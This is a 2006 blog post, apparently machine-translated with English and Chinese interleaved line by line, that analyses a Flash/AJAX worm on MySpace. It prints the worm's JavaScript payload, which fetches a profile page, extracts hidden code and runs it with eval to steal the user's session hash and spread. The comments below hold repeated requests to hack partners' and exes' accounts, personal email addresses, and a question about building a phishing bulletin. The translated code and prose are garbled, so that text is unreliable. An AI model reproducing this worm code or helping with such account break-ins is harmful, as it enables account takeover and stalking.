Hacking MySpace: How Flash & AJAX Based Worm Works黑客入侵MySpace上:如何閃光&基於Ajax的蠕蟲工程
MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. MySpace上已感染病毒由Flash為基礎的(瑞士法郎)蠕蟲病毒迅速蔓延,其中通過MySpace上。 It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec這是嵌入JavaScript代碼到用戶的個人資料重定向訪客到網站聲稱美國政府的背後9 / 11恐怖襲擊事件,賽門鐵克 warned警告 Monday.星期一。 However it may be just the tip of the iceberg.但它可能只是冰山的一角。 Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads.下面我們來看一看究竟是如何辦到的工程,以了解如何可以很方便地進行修改,以提供更毀滅性的有效載荷。
The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file.未命名蠕蟲並非惡意,但的Shockwave Flash ( 。瑞士法郎)文件,其中包含有效載荷的JavaScript嵌入到個人資料的任何MySpace上的用戶誰的意見。 SWF文件。 This can easily replicate這可以很容易複製 Samy is my friend德薩米是我的朋友 worm without breaking a sweat.蠕蟲沒有打破了汗水。
This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously).這個JavaScript代碼,然後加以解釋誰在沒有任何用戶訪問該網站,讓敏感的數據,被盜,例如作為一個哈希值,須進行業務作為一個用戶,並表演行動就代表該用戶(未經同意,顯然) 。 Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site.目前,進入正在只能用來傳播的JavaScript代碼到其他配置文件熱門的社會網絡網站。
If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content.如果是惡意的有效載荷,可以進行二次攻擊一樣,針對最近發現的漏洞影響Microsoft Office的內容。 The impact would be much higher exposing even sensitive information on your hard-disk.影響將高得多,揭露,甚至敏感的資料,在您的硬盤。
Let’s take a look at the worm, thanks to research by下面我們來看一看在蠕蟲,感謝研究 kinematic.theory : :
When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript:當您參觀了已經感染的網頁上,有一個閃光的對象嵌入式( “ redirect.swf ” ) ,其中包含的ActionScript :
getURL(" geturl ( “ url 網址 “); “ ) ;
It opens and redirects you to the specified blog URL.開放時間和您重定向到指定的博客地址。
On this blog url there is another flash file embedded - “retrievecookie.swf”.關於這個博客網址,還有一個嵌入式的Flash文件-“ r etrievecookie.swf” 。 It contains:它包含:
getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' geturl ( “ javas \ n \ rcript如下: var x =新activexobject ( \ ' msxml2.xmlhttp \ ' ) ; x.open ( \ '獲得\ ' , \ ' http://editprofile.myspace.com/index.cfm ? fuseaction = user.homecomments & friendid = 93634373 \ ' ,真正的) ; x.onreadystatechange =函數( ) (如果( x.readystate == 4 ) (無功pg = x.responsetext ;無功資深大律師= pg.substring ( pg.indexof ( \ ' bx - \ ' ) 3 , pg.indexof ( \ '當然\ ' ) ) ;而( ( sc.indexof ( \ '
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \ ')!=- 1 ) | | ( sc.indexof ( \ ' -三十\ ')!=- 1 ) ) (無功每組sc.indexof ( \ '
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ ' ) ;如果( ==- 1 )每組sc.indexof ( \ ' -三十\ ' ) ;資深大律師= sc.substring ( 0 , N )基金+ sc.substring (五, sc.length ) ; ) ; “ + ” eval ( 資深大律師);}};" + “ x.send (空 ) ; ” , “ ” ) ;
It opens another blog post (開放的另一個博客帖子( link鏈接 ) and evaluates its contents. ) ,並評估其內容。
This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace.此代碼得到您的MySpace上的散列,使任何人採取行動,正如你在MySpace和執行任何行動就代表你想改變您的密碼或某人加入未知作為您的朋友,什麼都可以在MySpace上。 Currently the code adds a message to your MySpace profile.目前代碼添加郵件到您的MySpace上的個人資料。 It extensively use AJAX for its operations.它廣泛地使用AJAX技術為其業務。
Filed under提起下 Computer Security計算機安全 , , Headline News頭條新聞 , , How To如何 , , MySpace MySpace上 , , Social Networking社會網絡 , , Spam Watch垃圾郵件觀賞 , , Web網頁 , , Web Services Web服務 | |
| |
RSS 2.0 2.0 | |
Trackback Trackback跟踪 this Article |此文章|
Email this Article電子郵件此文章
You may also like to read您也可以想讀 |



July 18th, 2006 at 12:36 pm 2006年7月18日在下午12時36分
hey嗨
if you happen to have a spare minute and feel like doing some technical charity work by expalining a few things to me, i would be most grateful.如果您恰巧有一個備件分鐘和感覺一樣,做一些技術性的慈善工作由expalining幾件事對我來說,我將不勝感激。
my email is我的電子郵件是 rachel_franciscova@yahoo.com
my aim is AKLsweetheart我的目標是aklsweetheart
thank you謝謝您
July 18th, 2006 at 1:48 pm 2006年7月18日在下午1時48分
Rachel,雷切爾,
Send me your requirements using the請給我發送您的要求使用 contact form聯繫表格 . 。
– Angsuman -由A ngsuman
July 18th, 2006 at 9:14 pm 2006年7月18日在下午9點14分
Another Worm, This Time on Myspace 另一種蠕蟲,這個時候在MySpace
Over at Simple Thoughts, they disect a Flash/AJAX worm that has been laying waste to MySpace.以上簡單的想法,他們disect一閃光/ Ajax的蠕蟲,已奠定了廢物MySpace上。 The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who未命名蠕蟲並非惡意,但的Shockwave Flash ( 。瑞士法郎)文件,其中包含有效載荷的JavaScript嵌入到個人資料的任何MySpace上的用戶誰
August 15th, 2006 at 8:21 pm 2006年8月15日在下午8時21分
help i need 2 hack into my bf myspace his email幫助我需要2哈克到我的高爐MySpace上他的電子郵件 pittbull2332@yahoo.com help!!!!!!!!!!11幫助!!!!!!!!!! 11
August 28th, 2006 at 3:34 pm 2006年8月28日在下午3時34分
what are u on myspace cuz i cant view the blogs that什麼是u在MySpace上cuz i cannot查看博客
u put on here u提出的關於在這裡
September 2nd, 2006 at 12:51 am 2006年9月2日在上午12時51分
sum1 went into my profile but never gave me my password if sum1 has plzzzzzzz lemme no….my email addy is sum1進入我的個人資料,但從來沒有給我我的密碼,如果sum1已plzzzzzzz lemme沒有… … 。我的電子郵件是addy lazyiegurl23@yahoo.com thanks謝謝
October 12th, 2006 at 7:06 am 2006年10月12日在上午07時06分
i need to get into my girlfriends myspace to see if she cheatin on with with one of my mates我要進入我的女朋友MySpace上看到,如果她cheatin就與與我的一位同伴
October 21st, 2006 at 8:34 pm 2006年10月21日在下午8時34分
help i need to hack into my bf’s myspace, i need to see what kind of mails hes getting.幫助我要開刀到我的高爐的MySpace上,我要看看什麼樣的郵件住戶開支統計調查獲得。 Hes cheating im sure住戶開支統計調查,確保即時通訊作弊
October 23rd, 2006 at 1:02 am 2006年10月23日在上午01時02分
i need to hack into my bf’s myspace, i need to see what kind of mails hes getting just very curious bout it.我需要開刀到我的高爐的MySpace上,我要看看什麼樣的郵件住戶開支統計調查取得只是非常好奇布特。 i dunno if He is cheating.but just wanna kno thnx. i dunno如果他是cheating.but只想kno thnx 。 plz help plz幫助
October 26th, 2006 at 3:14 pm 2006年10月26日在下午3時14分
i dont know if you will help me but at least i hope you read this. i不知道如果你能幫助我,但至少我希望你閱讀這本。
i dont want you to hack into my profile cause of a boyfriend or stuff like that cause i would just ask. i不用要你入侵到我的個人資料事業的男朋友或東西一樣,事業,我只想問。
but one day i changed my password and i wasnt paying attencion, so i dont remember what i changed it to.但有一天我改變了我的密碼,我wasn't支付attencion ,所以我不用記得我改變了它。
the problem with the forget your pass word link thing is.問題與忘記您通過Word中鏈接的是。 i dont remember my yahoo password eaither. i不用記住我的雅虎密碼eaither 。
i know im stupid, and i been very very depressed ever sense myspace.我知道,即時通訊愚蠢的,我一直非常非常沮喪以往任何時候都意識MySpace上。
i use to go on it when i was bored it made me happy.我使用下去,當我是無聊,它使我高興。
and now i been so misarble without it i dont know what to do.我現在這麼misarble沒有它i不知道怎麼做。
i have tried everything.我曾嘗試一切。
im desprate please just take a mommment of your time and email me the steps or something.即時通訊desprate請剛才採取mommment您的時間和發送電子郵件給我的步驟或一些。
my email is,我的電子郵件是,
candygurrl34@hotmail.com
please.請。
November 7th, 2006 at 6:26 pm 2006年11月7日在下午6時26分
hello,餵,
well yeah like the person ^ ^ ^ there said, i have the same problem.是啊,以及像人^ ^ ^有說,我有同樣的問題。
I cant rememebr my myspace password and well the email address in which i used to log in with is now cancelled ( is an old address ). i cannot rememebr我MySpace上的密碼以及電子郵件地址在我用來記錄在與現在已取消(是一個老地址) 。
If there’s some1 that can help me solve my probelmi will be very greatful and will really appreciate it.如果有some1可以幫助我解決我probelmi將非常感謝,並會很欣賞它。
I’ve asking for help since the past weel and apparently no one knows.我已經要求幫助,因為過去weel ,而且顯然沒有人知道。
thanks, Jenny.感謝,珍妮。
November 15th, 2006 at 3:09 pm 2006年11月15日在下午3時09分
i have a question!我有一個問題! i know javascript is disabled in myspace, but how then, did i come across a user that created a SECOND picture page in their profile.我知道已禁用JavaScript在MySpace上,但如何,然後,我碰到的用戶創建了第二頁的圖片在他們的個人資料。
when you hover the mouse above the “NEXT” link, it reads in the lower left corner of the web browser “javascript:_doPostBack(’ctl00$Main$ImageListings1$PagerBottom’,'2′)”當你將滑鼠游標指上述“下一頁”鏈接,它的內容,在左下角的Web瀏覽器“的JavaScript : _dopostback ( ' ctl00元,主要為imagelistings1元pagerbottom ' , '2 ' ) ”
then when you get to the second page the url reads “http://viewmorepics.myspace.com/Modules/ViewMorePics/Pages/ViewMorePics.aspx?%3ffuseaction=user.viewPicture&friendID=858155&MyToken=c6997aa3-bbeb-46ba-bbce-ee557f99b255″然後當您到達第二頁的URL寫著“ http://viewmorepics.myspace.com/modules/viewmorepics/pages/viewmorepics.aspx ? % 3ffuseaction = user.viewpicture & friendid = 858155 & mytoken = c6997aa3 - bbeb - 46ba - bbce - ee557f99b255 “
i want to know how to do the same thing to mine!我想知道如何做同樣的事情地雷! if anyone knows how to embed these codes into my site please respond!如果有人知道如何將這些代碼嵌入到我的網站請回复!
thank you!謝謝您!
November 23rd, 2006 at 4:38 pm 2006年11月23日在下午4時38分
can i know how to hack into someones myspace i really need to plz help send me a message at我能知道如何入侵到someones MySpace上我真的需要plz幫助請給我發送一條消息, truebiitch305@aol.com
November 27th, 2006 at 11:22 pm 2006年11月27日在下午11時22分
i need help lz some1 help me i need to get my myspace password and my email is fake so if u can get back at me我需要幫助lz some1幫助我,我需要讓我MySpace上的密碼和我的電子郵件是假的,所以如果u可以取回在我 plz…smile5toeddie@yahoo.co plz … smile5toeddie@yahoo.co , ,
November 27th, 2006 at 11:22 pm 2006年11月27日在下午11時22分
i need help lz some1 help me i need to get my myspace password and my email is fake so if u can get back at me plz….我需要幫助lz some1幫助我,我需要讓我MySpace上的密碼和我的電子郵件是假的,所以如果u可以取回在我plz … 。 get back at me取回在我
December 5th, 2006 at 11:32 pm 2006年12月5日在下午11時32分
i really need to get in to my wifes myspace plz help email me at我真的需要獲得在我wifes MySpace上plz幫助發送電子郵件給我在 livesk8er69@yahoo.com
December 10th, 2006 at 8:43 pm 2006年12月10日在下午8時43分
how do u hack into pplz profile on myspace if u got thier email???如何做u哈克到pplz的個人資料在MySpace上,如果u得到他們的電子郵件? ? ?
December 10th, 2006 at 8:47 pm 2006年12月10日在下午8時47分
can sum 1 send me the password to可以總結一寄給我的密碼 subrina@yahoo.com for myspace?為MySpace上?
December 11th, 2006 at 1:26 pm 2006年12月11日在下午1時26分
Hi,嗨,
Someone apparently got into my myspace page and was sending out bulletins inviting people to sex sites.顯然是有人進入我的MySpace網頁,並發出公告,邀請人到色情網站。 A friend told me that the same thing happened to her brother and suggested that I change my password.一個朋友告訴我,同樣的事情發生在她身上的兄弟和建議,改變我的密碼。 I must not have been paying attention because the password I thought I changed it to isnt working.我必須不被重視,因為密碼我以為我改變了它isn't工作。 The other problem is that the email address I usewd to set up the account is for my last school and I have since transferred, so now I have no access at all.另一個問題是,該電子郵件地址usewd設立帳戶是我在去年的學校和我有自轉移,所以現在我並沒有獲得所有。 I tried contacting Myspace but they keep sending me the same automated responses that don’t help.我曾嘗試聯絡MySpace上,但他們不斷給我相同的自動化的反應,不利於。 If you could help me get back in to my account I would appreciate.如果您能幫助我找回到我的帳戶,我將不勝感激。 I have a brother in Iraq and the only way I can keep in contact with him is through Myspace.我有一個弟弟在伊拉克和唯一的出路,我可以保持聯繫,與他是通過MySpace上。
Thanks謝謝
December 21st, 2006 at 12:00 am 2006年12月21日在上午12點
i need help hacking into my myspace and sum1 elses for revenge!!我需要幫助黑客入侵到我的MySpace和sum1 elses報復! they’ve bin spittin shiit about me on MY myspace for the past 3 MONTHS PLEASE HELP and e-mail me at他們已經斌spittin shiit約我的MySpace上,為過去3個月請幫幫忙,並以電子郵件通知我在 dirtymex77@hotmail.com
December 23rd, 2006 at 1:44 am 2006年12月23日在上午01時44分
dude i need to know how to hack into other peoples myspaces. dude我需要知道如何入侵到其他國家人民的myspaces 。 please let me know it would be greatly appreciated.請讓我知道,這將極大的讚賞。
January 2nd, 2007 at 3:23 am 2007年1月2日在上午03時23分
i need to know how to hack into other peoples myspaces too.我需要知道如何入侵到其他國家人民的myspaces太。 i would greatly appreciate it if u help me我十分欣賞,如果u幫助我
January 8th, 2007 at 7:04 pm 2007年1月8日在下午7點04分
i need the paasword to我需要paasword ,以 swardfox@hotmail.com as he has deleted my myspace lopads of times messed my msn up and talked to my friends i just want to sh it show him how it feels then hopefully he will leave me alone and i know i got hbim back for all the grief hes give me please give me the password to因為他已刪除了我的MySpace上lopads的時候,搞砸我的MSN和交談,我的朋友,我只想的SH顯示他如何感覺,然後希望他將離開我,僅我知道我得到hbim回所有的悲痛住戶開支統計調查給我請給我密碼 swardfox@hotmail.com thankyou so much it would mean alot xx “感謝這麼多這將意味著很多第XX
January 13th, 2007 at 6:46 pm 2007年1月13日在下午6時46分
Hi, It’s not easy to delete someone’s myspace account, it may be someone who knows your password to myspace and your email account must have deleted your myspace.It may be someone who uses the same computer with you…您好,這並不容易刪除某人的MySpace上的帳戶,可能是有人誰知道您的密碼以MySpace和您的電子郵件帳戶必須已經刪除了您的myspace.it可能有人誰需要使用同一台計算機上與你…
January 13th, 2007 at 6:48 pm 2007年1月13日在下午6時48分
The solution for your problem is, Just ask me what my password is………..!!!解決您的問題是,剛才問我什麼我的密碼是… … … ..!!! isn’t that straigh forward………….!!是不是straigh著… … … … 。 ! GET LOST迷失
January 19th, 2007 at 11:05 am 2007年1月19日在上午11時05分
i need to get in my grls profile i have her username but not her password help MEEEEE我需要得到我在grls簡介我有她的用戶名,但不是她的密碼幫助meeeee
January 24th, 2007 at 8:00 pm 2007年1月24日在下午八時
I need to help hacking into my girlfriends myspace to see if she is cheating.我需要幫助黑客進入我的女朋友MySpace上看到,如果她是作弊。 Please help.請幫幫忙。
February 1st, 2007 at 11:43 pm 2007年2月1日在下午11時43分
ROFL… you people are pathetic wanting to hack into your BG and GF pages! rofl … …你的人是可憐,要開刀到您的血糖及綠表的頁面! OMG im so insecure and unsure of myself! omg即時通訊,使不安全和不確定自己!
February 4th, 2007 at 12:30 pm 2007年2月4日下午12時30分
The man I was with-cheated on me and eventually left me for another myspace female.該名男子與我-我就被騙,並最終給我留下了另一MySpace上的女性。 We are ADULTS.我們是成年人。 Now he is taunting me via myspace and other ways.SO is the new GF.現在,他是taunting我通過MySpace和其他ways.so是新綠。
Before he and I split up, he broke into my home and stole over 40K worth of jewelry now he is in hiding.If I could get into his myspace I could possibly get some of my things back.I’m also the mother of his son.之前,我和他拆散了,他闖入我家,偷走了價值超過40 K的珠寶,他現在是在hiding.if我可以進入他的MySpace上我可以有可能得到我的一些事情back.i '米,也是他的母親兒子。 Please help us.請幫助我們。
February 4th, 2007 at 10:23 pm 2007年2月4日在下午10時23分
Gina,吉娜,
You should contact the cops & FBI and file a case against your boyfriend.你應該聯絡警察及聯邦調查局和檔案的案件對您的男朋友。 They can force MySpace to reveal the details of their profile.他們可以迫使MySpace上透露的細節他們的個人資料。
Wish you best of luck.祝你最好的運氣。
February 21st, 2007 at 12:11 am 2007年2月21日在上午12時11分
Hey!!嘿! Can somebody help me with finding out my gf’s myspace password?有人可以幫助我找到了我綠的MySpace上的密碼? I’m afraid she is cheating.我恐怕她是作弊。 Her email address is她的電子郵件地址是 tanyamendis@hotmail.com
Mine is排雷是 digital52306@hotmail.com
February 21st, 2007 at 2:23 pm 2007年2月21日在下午2時23分
i need the password for my myspace account but its not valid i cant sign on && it an emergency my working email is我需要的密碼,我MySpace上的帳戶,但其沒有有效的i cannot簽署關於& &這是我工作的緊急電子郵件 xxminnie420xx@yahoo.com thanxs i appreciate it thanxs ,我很欣賞它
February 21st, 2007 at 2:24 pm 2007年2月21日在下午2時24分
my myspace account email is我MySpace上帳戶的電子郵件是 playa42088@msn.com but i cant sign on i need the password send the password to但我cannot上簽字,我需要的密碼傳送的密碼 xxminnie420xx@yahoo.com
February 25th, 2007 at 11:23 am 2007年2月25日在上午11時23分
how can i get someones password to their myspace account so i can see their private messages?我怎樣才能得到someones密碼,以他們的MySpace上的帳戶,這樣我可以看到他們的私人訊息?
March 7th, 2007 at 11:03 pm 2007年3月7日在下午11時03分
hi..喜.. i dont know how this thing works. i不知道如何在這件事的工程。
or if you eve ngoingto get back to me on this message.或者如果您的前夕, ngoingto取回給我這個訊息。
i find it pretty weird how everyone wants to know how to find someones pass word.我覺得相當奇怪如何大家都想知道如何找到someones通過字。
i wouldnt want that done to me. i wouldnt想所做的我。
but if youu could message me back asap但如果youu可以給我回的ASAP
i would apreciate it我想它apreciate
i have this friend that told me they know how to get into peoples profiles.我有這個朋友告訴我,他們知道如何進入人民的概況。 and im afraid i might be next.和IM ,恐怕我可能會在明年。
i dont want them to get into mines too!! i不用想他們進入地雷太多!
wat do i do!!!!!掃管笏做我!!!!!
March 13th, 2007 at 9:38 pm 2007年3月13日在下午9點38分
help i need 2 hack into my bf myspace幫助我需要2哈克到我的高爐MySpace上
March 16th, 2007 at 5:35 pm 2007年3月16日在下午5時35分
how can i get my girls myspace password…如何能使我的女孩MySpace上的密碼…
I know her email address……我知道她的電子郵件地址… …
How can i create a phishing bulletin to send it to her?我怎樣才能建立一個仿冒網站公告將它傳送給她呢?
March 22nd, 2007 at 5:26 pm 2007年3月22日在下午5時26分
this is truly depressing…most of you dont really have a real reason to break into peoples profiles…i feel bad for those who have lost their passwords, but honestly, how does anyone even know it really is your profile?這才是真正令人沮喪的…大部分您不真的有真正的原因打入人民的概況…我覺得不好的那些誰失去了自己的密碼,但坦白說,如何沒有人知道,即使真的是你的個人資料?
i suggest that if you really want some help, you help yourself, and learn how you can do certain things and get around certain restrictions to attain what you want.我建議,如果你真的想一些幫助,你幫助自己,並學習如何你可以做某些事情,並得到周圍一定的限制,來達到你想要的。 other peoples knowledge is not a free service.其他國家人民的知識是不是一個免費的服務。
March 23rd, 2007 at 2:02 pm 2007年3月23日在下午2時02分
i really need to hack my x friends password so i can get into her myspace!!!!!我真的需要開刀,我x的朋友密碼,所以我可以進入她的MySpace上!!!!! please please help me…..sen me an email!!!!!!!!!!!!1 PLEASE請救救我… ..我有特殊教育需要的電子郵件!!!!!!!!!!!! 1請
PLEASE請
PLEAS認罪
I REALLY NEED TO KNOW THIS!!!我真的很需要知道這個!
April 2nd, 2007 at 7:55 pm 2007年4月2日在下午7點55分
hi…i need to get into someones myspace…it is very urgent.喜… …我需要進入someones MySpace上… …這是非常緊迫。 if you could please tell me the steps that would help me out a lot.如果你可以請告訴我的步驟,這將有助於我出了很多。 thank you very much非常感謝
April 7th, 2007 at 4:31 am 2007年4月7日在上午04時31分
i need help hacking in to a mypace email me at我需要幫助黑客在一個mypace發送電子郵件給我在 foreva_latina@yahoo.co.uk
April 21st, 2007 at 6:24 pm 2007年4月21日在下午6時24分
I need to know How to find an ex’s password on myspace, please help!!我需要知道如何找到一前的密碼在MySpace上,請幫幫忙!
May 1st, 2007 at 12:11 pm 2007年5月1日在下午12時11分
ok, i’ve been hacking for a while & this flash file seems to be a really easy way to get peoples accounts, but the problem is to change a myspace password you need the password they are already using.